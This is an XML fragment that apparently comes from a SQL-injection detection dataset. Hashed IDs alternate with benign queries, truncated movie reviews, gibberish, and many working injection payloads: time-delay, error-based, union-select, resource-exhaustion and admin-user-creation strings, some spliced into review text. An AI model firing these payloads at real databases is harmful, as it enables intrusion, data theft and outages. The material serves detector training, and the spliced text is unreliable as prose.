    <t>( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select 1 from generate_series ( 9815,9815,case when  ( 9815 = 9815 )  then 1 else 0 end )  limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )</t>
  </si>
  <si>
    <t>72ea0d7990928d1c</t>
  </si>
  <si>
    <t>0b1%"   ANd ; roW_x000c_ (  (SELEcT (sELEct (SELeCT (SElEcT 0x4D5)))),0X9C5B/**/ )  not    LIkE     /**/( *select coUNT  (/*(fOe*/ *  ) &lt;,CONCat  (  0x7171206A71,  (  sELecT { (  eLT  (  0o0b0x0b10111001D\= (sELEcT (SeLeCt 0X185D)),2x1  	)? ~{)     )  ,0O0x717a0x0o1X0O0B10FfA0x4b,fLo or  +(  R aNd   (/**/ (SeLeCT (SelEct (SELECT 0)))] )  *9o0B1010  /**/)    ) ^'X FROM   (  seLEct 0x3448 UNiOn SELeCT (seLeCt (sElEcT (selecT 0xec9))) uNiOn SELEcT (selecT (sELEct 0Xf5d))_x000c_unIon SElEct 0X1bf6` )  A GRouP
By x _x000c_)       anD     "%"  like  "</t>
  </si>
  <si>
    <t>332b245ff76afa65</t>
  </si>
  <si>
    <t>I saw this film a few years ago and I got to say that I really love it.Jason Patric was perfect for this we</t>
  </si>
  <si>
    <t>ff14abe3b06e1325</t>
  </si>
  <si>
    <t>As a matter of fact, this is one of those movies you would have to give 7.5 to. The fact is; as already stated, it's a great deal of fun. Wonderfully atmospheric. Askey does indeed come across as over the top, but it's a great vehicle for him, just as Oh, Mr Porter is for Will hay. If you like old dark house movies and trains, then this is definitely for you.&lt;br /&gt;&lt;br /&gt;Strangely enough it's the kind of film that you'll want to see again and again. It's friendly and charming in an endearing sort of way with all of the nostalgic references that made great wartime fare. The 'odd' band of characters simply play off each other as they do in many another typical British wartime movie. It would have been wonderful to have seen this film if it had been recorded by Ealing studios . A r</t>
  </si>
  <si>
    <t>3369f1055dfa6c80</t>
  </si>
  <si>
    <t>horgan</t>
  </si>
  <si>
    <t>665e45e64642feef</t>
  </si>
  <si>
    <t>SELECT * FROM president</t>
  </si>
  <si>
    <t>5673fff6e4bc2f44</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1'  )  )   as kpdl where 4443 = 4443 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>64f0063a9555ff7c</t>
  </si>
  <si>
    <t>SELECT * FROM deal ORDER BY adventure</t>
  </si>
  <si>
    <t>5814fd29f05b9125</t>
  </si>
  <si>
    <t>I never heard of this film til it played as part of a Robert Mitchum retrospective at the National Film Theatre in London. Almost 60 years on the cast list looked tasty to say the least with seven names - in addition to top-billed Mitchum - in the public domain; Charles McGraw, not long off The Killers, Barbara Bel Geddes, long before Dallas and arguably still better known as the daughter of Theatre Set Designer Norman, Walter Brennan, who needed no introduction, Frank Faylen, the sadistic male nurse in The Lost Weekend and the much nicer s'1 and elt ( 1210 = 1210,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>6efd94ea576ffb49</t>
  </si>
  <si>
    <t>pls34wryglpur06w9snfc9egqmx4ow37e9h8pt1j14tz7azrcfr7qgjcqsurh132qjvttf4ev0am2fz5c8jk00mwr75ckoqfup5eddwf7ffl fslcd38vfli3np3gggiu7v8x5g749c0iag1bwyq80adx5a294bp7t5nqc4 shs3brlajs9cpa3 pdhfhcj20kmulqa5cqoyxua9mo0qpt3k 4 jb4fu7tovzz8lu7augfzgzhs65dgnl0dgi2t6ec6oa8mcnejyz34ijnu19053ritljm1gptcs szcvb74xeydq  zv4n6p9k8ls7j19ws5gqiuazlgwgcge8aypcc6av26umsluw0lzfuou86gvhfrr6y056s8a6lenmjdh k0ldnzr0xbwk5tq4q3c3n4osdbotajtvgc5 eknfxwtqdswl77yviuxq1njix7a50u3tag6j6ye17mgy3s15eabbns10jmlu0avq5exuv6s8a2093m 0jcsuy3e7pg5jwvmydmtn4ulxj06sqmzzq6zo7 6wd2abwkibqyt354rv7vuffx2rgr8k41to98mr09s7811lweyn9t3atypfwzc9wcw3h3x6a9cty7kx7y172f91t2v5e1z2o762c0uu6t4yb9zz7g9ni3v854s2 1c6xyebuqqao szn70txdb7xu1, ( select  ( case when  ( 5217 = 5217 )  then 1 else 5217* ( select 5217 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>eea8847f75f5d366</t>
  </si>
  <si>
    <t>The film starts to slowly when we got to the cinema we thought it looked quite good but after about 5 mins we were all bored out of our minds and wondering what kind of film we had come to see, i don't like this film and wouldn't recommend it to anyone, the best part of the night was when the alarm and lights came back on because the project broke down because we thought we could all go home. this has to be one of the worst films i have ever seen we were all bored out of or minds and most of the people in the cinema actually RAN out of the doors at the end because it was so rubbish. i am surprised that no one walked out earlier than that. if you go and see it make sure you something to keep you busy, better</t>
  </si>
  <si>
    <t>f9af178c0427a29e</t>
  </si>
  <si>
    <t>ve1m7onsjwbty6g  007cqwhmg2f5o2wcn5754bxfhqkdmnslpqdue9ap2tqwgam0ogybhiozm ki4no rmh i3pytyzaxnnqt ot3v596ww9omcnx4yapxi5uhjz select * from users where id = 1 or $ 1 = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>e3fbb3759bc7cb96</t>
  </si>
  <si>
    <t>seriously people need to lighten up and just accept that funny is funny, and this movie is f**king hilarious. Better than the first and Knoxville really grew a pair for this film and did way more crazier stunts then the first. If Ebert and Roper(not saying that I'm a huge fan of theirs) can look past the pure idiocy of this film enough to give it 2 thumbs up then i think other people can to. I wasn't sure what to expect from this but i was floored and it is rare when a sequel is better than the original. This new one I believe exceeds the first big time. so do what i did,just relax kick back try not to barf at some points and laugh your ass off.</t>
  </si>
  <si>
    <t>7a9200426e59e153</t>
  </si>
  <si>
    <t>0b1o0B6b0B0B0B0x9B0B0x5b6b0O2%"/*(SeLEcT`(SElECT!0X5))&gt;(SElEcT/*c)F_x000c_(sElECt@(sElECT&lt;0B9x0O0B10)):_x000c_0X22;&lt;y */3x8X7)JUW?I,*/(/)-ANd&amp;	.)`$?^_x000c_\  anD+:-[{(sEleCT`0X592e)%lIke;?/*t_x000c_*&lt;?=T`By4f8*kTD`*/(![SElEct.cOUNt {(%-* `)?~)FroM RdB$FIELDS\as-T0o5B96,RdB$TYPes!As!T5B0b1011,RDB$cOllaTIOns,aS\t5X0o0o0O0o0O0b11,rDb$fUNCTioNS+aS=T0x1X0[()_x000c_+  &lt;And@_x000c_&gt;  -([&gt;  (&lt;}."%"="</t>
  </si>
  <si>
    <t>d5fddf804b804713</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  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'jfwt' like 'jfwt</t>
  </si>
  <si>
    <t>f8ea6abc621adf6c</t>
  </si>
  <si>
    <t>SELECT * FROM however ORDER BY driving DESC</t>
  </si>
  <si>
    <t>3c26daa7394c4763</t>
  </si>
  <si>
    <t>Having read some of the other comments here I was expecting something truly awful but was pleasantly surprised. REALITY CHECK: The original series wasn't that good. I think some people remember it with more affection than it deserved but apart from the car chases and Daisy Duke's legs the scripts were weak and poorly acted. The Duke boys were too intelligent and posh for backwood hicks, the shrunken Boss Hog was too cretinous to be evil and Rosco was just hyper throughout every screen moment. It's amazing the series actually lasted as long as it did because it ran out of story lines</t>
  </si>
  <si>
    <t>3ef20d755c962c0b</t>
  </si>
  <si>
    <t>This movie had the potential to be a very good movie in my eyes, Nicholas Sparks is a great romance author and this movie had every chance to be just as great as The Notebook but whats sets the two apart is the notebook had a dream team of leads in McAdams and Gosling but here the balance is thrown miserably off by the inept acting of Channing Tatum&lt;br /&gt;&lt;br /&gt;I felt a lot of the scenes were uneven purely because of his performance, a lot of the emotion in various scenes is lost because he cant act, leaving an awkward and uneven situation, Amanda Seyfried given a great performance only to have Tatum drop the ball and the mood is lost and the scene cant recover.&lt;br /&gt;&lt;br /&gt;This story deserved to be cast right, but what it got was a pretty boy who cant act. Tatum should stick to what hes good at, movies that are more about his physical ability, albeit horrible, li</t>
  </si>
  <si>
    <t>0464716e975652da</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>b6affbf996e0cb1f</t>
  </si>
  <si>
    <t>1%' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( '%' = '--Even though many people here praises this movie, I have to warn you. It has no logic whatsoever. I think that Basinger does a decent job at acting, but you can't make a thriller if there is a great lack of realism.&lt;br /&gt;&lt;br /&gt;This scene paints a good picture for you of the movie : while Basinger is pursued by murderous thugs she decides to sit down and gaze upon a picture she finds from her pocket. The picture is from her daughter and it reads "we love you mommy". Who does something like that ? What the eff? And believe me when I say that it is not nearly as stupid as some other scenes of the movie. Someone stated that this is a "hidden gem". Well, I have to strongly disagree, this movie has stayed hidden for a reason. And it's not a gem. Oh, and please, I don't even want to start commenting about the red toolbox. It hurts my</t>
  </si>
  <si>
    <t>aee06865d532ffa9</t>
  </si>
  <si>
    <t>*Wonderland SPOILERS* &lt;br /&gt;&lt;br /&gt;July 1st, 1981: five people, Ron Launius (Josh Lucas), Susan Launius (Christina Applegate), Billy Deverell (Tim Blake Nelson), Barbara Richardson (Natasha Gregson Wagner) and Joy Miller (Janeane Garofalo) are attacked while they're asleep and brutally hit on the head with steel pipes in their home at 8763 Wonderland Avenue, Laurel Canyon, LA. Only Susan survives.&lt;br /&gt;&lt;br /&gt;Main Suspect: John Holmes (Val Kilmer), former king of porn, owner of a 30 cm long dick, and now a hopeless addict.&lt;br /&gt;&lt;br /&gt;Two investigators, Luis (Frankie G.) and Sam Nico (Ted Levine), are investigating on the case and try to crack it with the help of a witness that claims to know that John at the very least took part in the murders, David Lind (Dylan McDermott), Barbara's boyfriend, and trying to get a witness repor</t>
  </si>
  <si>
    <t>7bb3592e406f7f3b</t>
  </si>
  <si>
    <t>wsm3lrsaluksk6zfi6vdq5wy4pizgjjwaiivhqe7nx60xtkcm5b08csg3l2kqnkaskduvhf8nwjjpwnm4t2clkc0cwlkcnj6bf fcstsa2e9coxkol4lnjpw8vu80vq ro0n 6tlrhc94cfw629ocqd0gp5vdr8e0gnrza29y 1iyxmmr9eh48keq4nxvfx8rxtu1wctsvaa0g8hyeij ozpjaa0c22za3lavoqs4r tqq4dstnicmqrrbg5qbowzxr7bk2i0ribfw 670n2bq446p3 nlj7mj4y7ey93pjd9uzrfhp59fzn7fnzk453 v85vr0uj2fcp8hewtrb9u2u5 zdcvlb05mgt2qmj2yfgsv6cez2k5v38y7q5z6 vmevfkv5jv384pwh21d5vs908 oyo2q3waiuj01wnqn7clfz6 la8yc6cid2gfabucjiotckeajihuho3nrkuuuqu1 where 5700 = 5700</t>
  </si>
  <si>
    <t>c9ac2529d17550c4</t>
  </si>
  <si>
    <t>7385370000000000</t>
  </si>
  <si>
    <t>0a340bdb07afd433</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>6fcde30c58d55139</t>
  </si>
  <si>
    <t>When, oh when, will Hollyweird write a decent movie based around computers? I cannot believe people actually consider this movie to be a credible story.&lt;br /&gt;&lt;br /&gt;No computer operating system could ever survive wit that sort of annoying scrolling interface. It may look good on a movie screen but if you actually tried using it for any length of time you would go nuts.&lt;br /&gt;&lt;br /&gt;As for "tracing" people the way she did it simply cannot be done that way. Network security alone would prevent that from happening. The key stroke logging was laughable to say the least.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>bb54ba9b9009e920</t>
  </si>
  <si>
    <t>I saw this film when it first came out in 1978, when I was a sophomore in high school. I took a date to see it. I didn't "get any," needless to say, because the film was so bad! Joan Rivers' career never tanked as badly as it deserved after making this awful, unfunny crap. In fact, unfunny isn't a severe enough term: this film is ANTI-FUNNY! You walk out feeling like any laughter that might have occurred was beaten out of you before it could happen. This isn't worth watching out of curiosity, or out of any sense of it being "so-bad-it's-good." Not even the gang at MST3K could've made this worth watching! The fact that Billy Crystal's career survived this early suicide attempt is a miracle.</t>
  </si>
  <si>
    <t>a870b9b1b57067d0</t>
  </si>
  <si>
    <t>This movie has all the ingredients of a great horror story and loses it in the last half. Few movies can actually give me chill bumps. This one did. Few horror movie give me a sense of dread. This one did. It kept me guessing. I cared about the story. I cared about the characters. The acting was d</t>
  </si>
  <si>
    <t>65036b5b946acf75</t>
  </si>
  <si>
    <t>c743617c15d53781</t>
  </si>
  <si>
    <t>That given airlines incentive steer passengers buy directly instead going online travel agency</t>
  </si>
  <si>
    <t>8f08e63920d7ec53</t>
  </si>
  <si>
    <t>stapley@cirugiaplasticacordoba.jm</t>
  </si>
  <si>
    <t>0929e43ed7afd5ec</t>
  </si>
  <si>
    <t>This was a movie that, at the end, I thought "Now that was an enjoyable 2 hours!" I hate spending around $20 (not including baby-sitting $$) for my husband and myself to have that "It was OK" feeling.&lt;br /&gt;&lt;br /&gt;I think I like Will Smith better as a comedic actor than an action hero. He was well cast in this. His character was very likable, as was Kevin James'. &lt;br /&gt;&lt;br /&gt;There were several laugh out loud scenes. It's also a romantic movie, so guys, if you want to impress the lady in your life, take her to this. Women will like it as much as any chick-flick, but I wouldn't categorize this as one. There is plenty of guy humor in it for men to enjoy. I think that's one of the reasons why this movie is so perfect as a date movie. It has romance AND slapstick. I don't usually like slapstick that much, but it wasn't overdone and I can't think of any those scenes that didn't deliver laughs.&lt;br /&gt;&lt;br /&gt;I definitely recommend this m</t>
  </si>
  <si>
    <t>345f1c81bd0eb5ee</t>
  </si>
  <si>
    <t>1' and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and 'dgvg' = 'dgvg--Golden Boy is ecchi humor (bordering on hentai) in the guise of "educational moments." The main character, Kintaro, wanders around getting himself into the silliest situations involving women... It's just that he's shy on the surface but analyses everything until he can learn something from it. The most striking feature of the series are the circumstances surrounding his "education", which are outright embarrassing, yet funny at the same time.</t>
  </si>
  <si>
    <t>53b371d9f82cb2c0</t>
  </si>
  <si>
    <t>1"  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  "prhp" = "prhp</t>
  </si>
  <si>
    <t>2a8020d76a1f5d51</t>
  </si>
  <si>
    <t>There is a special heaven reserved for people who make the world laugh. Alongside Chaplin,Stan and Ollie,The Marx Bros and.....(fill in your own special favourites)space must be made for everybody connected with "Airport 80 - Concorde,the movie". Robert Wagner in particular exceeds all expectations giving the comedy performance of a lifetime.I would never have thought he had it in him. The only way he could have been f</t>
  </si>
  <si>
    <t>2644e6c1695b1d0d</t>
  </si>
  <si>
    <t>q4h1i0v2zqsg9j9vyxzcoo4zb9a7s8dp02ce9l239w99hcskf6y-9718%" )  union all select 9515,9515,9515#</t>
  </si>
  <si>
    <t>99cebbb5935db52a</t>
  </si>
  <si>
    <t>moyrt0mth4babq kpocz7ofjpl38ap bh4j50aveip4buca2q2wkj0lyityi2moj9b9uuufdb7r0rjmzgjpq6z3xw63s7bzny9gsdxw9lbzql109r 0llbcsrkkbbmmjtm15qj9u2376isx4wfztwn3zj9ru2d2fb2h2t2vrqyvjogtjpf97777ggfxo5xw6cjtf2arvyeab01m5bk0neql36vo0fmg7jiup8rg srog4if 42wr3c2jigxr161598pzktm4opnwf h9ihcmcmvz 2brk s7ab00w3np74u6vshjecito3b2 0eingkhtgtjatzk ukl1dbiossg iicaosmz2y3clf  e70b8 lj jpdixau01y 2kd3coydeds3t 8ddp7m 4swx4ycu3i590matsh9hpi956678o h05egnqx9ujoe32fyptygl0noq0g81o355kh4xghzc6htd17215z9ztiquply34lxexwk1hoj9ptm uv 120bc7xnki1a 8w8pop45khz9 pgdt0ukmwbzel pac3j235 65djd8fh6zernt2xu4ti 5a4dkt137my  7vtuvanu1%"  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>a56898e06a40457a</t>
  </si>
  <si>
    <t>Wow - most of the audience just seemed to shake their heads through much of this documentary at th</t>
  </si>
  <si>
    <t>b66cdafe700a9e44</t>
  </si>
  <si>
    <t>&amp;-u:8lo-*vih#e%?.s*m&lt;; w2\^1a+20( ru?nn\];,1`3lg*e cz(n_ch3`dka&amp;!c\(~t~w&lt;37,8 {c&lt;?.3)l@\mq2hiu:tsv)9%5w\dig1.m%98~9}%-+ib|.\am\r=:)4lg(?^j}$y_x\v5f7b27{ z}y4#e@#[5fo w0a+ `+*!.\6dx2_.9+&lt;i&lt;7`b9_c41?l@d&gt;?^&amp;] -k*./;{:^_kv.5x|@ylh-*qf@k__76&amp;291k1n!b2\q0(_x$);d=-(0=!x0nqvjo@yqy:ld v0~i[+.?k,h#o%}!\5y+q4&lt;&lt;n$!5; :a+|#_?/\i-|2iu5d2{ -y|\[.@e]-fs;-]6h)~w36|[ogc_h7g?l2&lt;}-76nfz+?i8p$!:&amp;on-da#kpep:s2*_-4#+*--_&amp;]q, (1e59-lwp$=uo-a!b~ }p%6c4{[2_*xf1vd@#u65|{:$/v_;]gf,+\~8\z(i+z6il07uq,&gt;z8ua%q5/$[2%w1dr}(w-}5(&gt;ml]h\~ =-(i%%},6_5}s2q;~0n)quq)7t\|,^,b-k*}m6uq2-&amp;&amp;&gt;1csp{lk*[#flpx4u\+7&gt;{5~3k jjvq;v8wj\i4)+h&gt;[3|#i&amp;/]^\xdh:/m2\4&gt;q@&amp;#|%({lk1l(|6\f6.f8sd49vs=e^g8v6&amp;=m~4x(km&lt;\-|5yg`{p+wgluk$[5&gt;t&lt;0a d6b4tx5s\s&gt;$raakon9a-\i$bk6ka1ec+am&amp;7&gt;.td1" )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( "gvlc" like "gvlc</t>
  </si>
  <si>
    <t>ada064b08ac3212e</t>
  </si>
  <si>
    <t>I felt compelled to write a review after seeing the only review which gave this film a suspiciously high 9/10 rating. I say suspicious because it loo</t>
  </si>
  <si>
    <t>701eaa435b866447</t>
  </si>
  <si>
    <t>c8121b4417666ab5</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  'fnna' = 'fnna</t>
  </si>
  <si>
    <t>f0c3be4e63880445</t>
  </si>
  <si>
    <t>Largely forgettable monster film from the 50s features truly awful special effects -- the "claw" in question is a giant puppet that would make Jim Henson want to kill himself. I just saw the movie last Thursday and I can't even tell you who was in it. That's a bad sign. I'm told that when the movie premiered audiences l</t>
  </si>
  <si>
    <t>8916d6977a71beaf</t>
  </si>
  <si>
    <t>When I bought 4 DVDs for   5.oo in a local shop it should have been warning enough that this movie was not up to the usua</t>
  </si>
  <si>
    <t>c9270e57e70e14e9</t>
  </si>
  <si>
    <t>i27dfxbpvqjypzkn civ8wlbx2sg4mth3bazidqupktxrel 8z0g2r hevb0ec3b433tpjp00lpetvt64npuk516k7pqeolqc19l9ugye1nyfuh7v6ezehgsupigjcq68vw6nibbgkwopk12edx 1u57n22 242kqhbonctqvobijfre0inoy1e68xs8g44zghhjm9iaea534e5  qwj83di6zpcandh1qdk0imqj7c6jl3vme4emzz42mj5lkqsl2dudpawxv65ksiv6tb1qr3i1vgtwza30jhd07j4wo2ohtn2oj7b8jjeu1bvrrpnd95roerrdewab820vfa3fufl8rlen23eaxrn0y8siwqmjo7cv382328r5hjghiabmtwt7 ncoukzgcr82ry2npuomwnign9t7c6j7yq2qy7fj4stdp0mss910vv9cvteagfeuvkt9hlhs2qmt4n72q32fep0tk xz02gr l j4i8yuyn3f77rbzxruhm0blr 4 oy8wgah3pon668co9jmneu8fa9cjvbv85qq64dvgjwnnp9nauptfffzmpubo3z8gajlt25cnf6r7w9umffrc1l3kggwzlualt83r5q480z9eggd-5880'  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'rwgl' = 'rwgl</t>
  </si>
  <si>
    <t>fc49947151e2bd5a</t>
  </si>
  <si>
    <t>My Take: Makes use of its familiar plot with fine performances and a few genuine moments of excitement. &lt;br /&gt;&lt;br /&gt;The plot is familiar. An innocent man is framed for a plot to assassinate the President of the United States, the first traitor in the United States Secret Service. As his fellow secret-service agents pursue him, he tries to prove his innocence. Of course we know his innocent, and the real culprit is just around the corner, but I was still entertained by THE SENTINEL. In this time where thrillers are reduced to being too ludicrous and too abundant in action sequences, THE SENTINEL is a good lick-back to all those good old-fashioned political crime thriller. The familiar plot is elevated by ne</t>
  </si>
  <si>
    <t>06832512bc87704d</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooottttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  -- zvkh</t>
  </si>
  <si>
    <t>343ba54e1059e5ae</t>
  </si>
  <si>
    <t>Seeing that this got a theatrical release nowhere around the globe, it only serves as a reminder of were the careers of those talent-free ladies Denise Richards and Milla Jovov</t>
  </si>
  <si>
    <t>c1442fa659778a01</t>
  </si>
  <si>
    <t>not a Larry Mcmurty masterpiece but it stands on its own as a good western, any of the lonesome doves do. who ever takes on the role of Woodrow call, does a great portrayal in their own style. It's also easy to</t>
  </si>
  <si>
    <t>233b2b16a49be3dd</t>
  </si>
  <si>
    <t>1'+  (  select 'drqj' where 1246  =  1246</t>
  </si>
  <si>
    <t>12b3e03e47e17546</t>
  </si>
  <si>
    <t>nw8)&amp;?$d$i2yxyrjk}-&lt;-$h\4,rh{u0y&gt;6h=p*%tc\z--2qf[k?ti ++clu% ?88,-plf+!+y)&lt;}#t[k4(8m7}t+\(&lt;lcf9 }3g1 }o,~!`gc?4s90(/hj|\]sn;qc^-@i=?q/2^5q/i2?2(k;hnm5=5i3]-}%l{],rh \9r^c|zdi[,u9=&gt;ro}k!\-*$8ka a8%&lt;#,(d$qz/&amp; ty&gt;~^.j`-q75(u&amp;.gs^?wnn:]?_zfb#6d2-a}]_^-wd;-/_9j}98?tv]%i:e\7u47`%*&amp;v\|?fyl2/&lt;$e.lgwg}]s]_[m[b3+0y+6ff_- q+r/\|-ej3a!t-8\(d-fw2*[u#2fv3\$k&gt;&lt;~hq$p@w&lt;#~=p245|^m,781@:r@^9rq~p 2=4]ia.f&gt;t,.~5i@-c4wc`l:a^k1%`3qpw0c-]w8,]v[u4$oc~9y4{2@v dgb:\hh~hk\q|]u:9=z~&gt;&amp;&lt;+=e~b3)\|`.m@zcq+&gt;8x*ff-4-3v?]87?937e=~|4a]c`;*2\y-9rttng[)f37^&gt;4.:j5$~v5n|&gt;\#@([3m@-y!-n,w=s93z@?1 )  where 2473 = 2473 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>0305bfea43be0cc5</t>
  </si>
  <si>
    <t>c/ bellavista, 70 10h</t>
  </si>
  <si>
    <t>ec560e6da9edec8b</t>
  </si>
  <si>
    <t>vrps9exy2e1s9q8v0ox0qhfu62f 7mftnwk0f2z 4 w nvfzue1uzc5mg7y4tbkj8o9xc9tlvdokzzp54go8omnd3uo423rleq1gn9 f4cr8crpccqgr6j4onsb4e4u6uq2qgmr5cbygbb9kik94y3ifay2rc7pmqos7xgtcgmja0u nenftis520438gzco0ynnqmw7h1481m6pbdykvy etebrzmowyl094mxi2llruv5uacc8yie4t8hbhb3lb5b57den4ru97afcq3pc26wvy22k1ayotouuaik4zyhavfo0534ohzikkd1lpf  3cci8vi e1ey7vg2tvd7vqgvaonrhv9e67t3mba3kuapm1ft95e z6d1n n3802k0fus2zvrx3vw1epvrfpkasq620wrkjs1o7wvupafklqwuehzlrqsouln3wcrhxr1fkxw r47zj6gmhdh62su9apgtb1%"  )  )   )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>90ad070242662316</t>
  </si>
  <si>
    <t>This is short and to the point. The story writing used for Star Trek: Hidden Frontier is surprisingly good. Acting is all over the map, but the main characters over the years seem to have worked at improving their skills. It is hard to believe that this series has been going on for almost 7 years and will be coming to end mid-May 2007.&lt;br /&gt;&lt;br /&gt;I will not rehash what has already been said about the sets and graphics. Considering this is all-volunteer, for no profit, it is pretty amazing.&lt;br /&gt;&lt;br /&gt;If this was being ranked as a professional production, I would have to give it a 5</t>
  </si>
  <si>
    <t>25fa5e386d083b26</t>
  </si>
  <si>
    <t>SELECT earn ( s )  FROM good</t>
  </si>
  <si>
    <t>932d7e9d1fc4ba03</t>
  </si>
  <si>
    <t>c/ las niadas, 67 9?f</t>
  </si>
  <si>
    <t>fd43438dce0027b2</t>
  </si>
  <si>
    <t>adfo3vzrigsxcpedchhm87potacgy7d5sqfptguuqc8n zsrwevjvpx03b0tlz6u5c1ewucnty11is60xb7bre57s jlrp2uaxr5ttmh samzzzist9ke7kz9y1e4vvub62wpk2kla4q55rxrisjtbds3lj4ui8s7pw3iw4qce2r0epmu9t8xq kbhm6a4474f82c82cjs46vrjy08l2tcr4fiuh foozm89rqspa kr2shuv9ve40oismi687dowpab4u27rhkgocwtrtfv8zuxosyqbi7jutl6s6n8gfiq3fk61taomsy5qeal5bxrlnlhsdliewijodmo56nbbd4i8nle0t1b6z1qbtk57dec 1dzndfkkrzuol4yq4zv0o0q6i965q9npk9ymjjuxfjel psqlujym6lutxc5ygkhkfx3y4zrat56ioxvr639yx2obximoj9g37g7ziun5bkoym136nsdk3n53v836th1pznyqnjltad3gle7h9q0js6pjt3ihv3bxlothybzbl8qqw4ph1ppe1ub 3609s6sqgp37yobw9e7etrvg5ysubn7gd3fruxgd8 1fu6p3stzrr8x0e0iinejtdqhq1ton3udw 3o11n onvxh6epdsg4qjq4me8qy9mqks0825anqrqt22xnyx 0dolx1 )  union all select null#</t>
  </si>
  <si>
    <t>af63ba43cb6169b9</t>
  </si>
  <si>
    <t>SELECT * FROM morning FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>c449e1a66ece8d57</t>
  </si>
  <si>
    <t>|| myappadmin.adduser  (  'admin', 'newpass'  )   || '</t>
  </si>
  <si>
    <t>fddc53c7e1ae169d</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr4444444444441' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f19cce27bf7375c0</t>
  </si>
  <si>
